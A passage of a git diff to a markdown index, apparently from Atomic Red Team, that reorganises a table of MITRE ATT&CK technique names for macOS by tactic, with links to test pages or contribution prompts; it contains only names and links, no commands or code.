b/atomics/Indexes/Matrices/macos-matrix.md index 952efc86..b4352dce 100644 --- a/atomics/Indexes/Matrices/macos-matrix.md +++ b/atomics/Indexes/Matrices/macos-matrix.md @@ -1,46 +1,48 @@ # macOS Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | -| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Scanning](../../T1046/T1046.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Network Sniffing](../../T1040/T1040.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | [Unix Shell](../../T1059.004/T1059.004.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Launchd](../../T1053.004/T1053.004.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Screen Capture](../../T1113/T1113.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | -| | | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | [Hidden Users](../../T1564.002/T1564.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Rc.common](../../T1037.004/T1037.004.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | -| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Rc.common](../../T1037.004/T1037.004.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Startup Items](../../T1037.005/T1037.005.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Non-Standard Port](../../T1571/T1571.md) | | -| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Trap](../../T1546.005/T1546.005.md) | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Startup Items](../../T1037.005/T1037.005.md) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Trap](../../T1546.005/T1546.005.md) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | | -| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | -| | | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Cron](../../T1053.003/T1053.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A 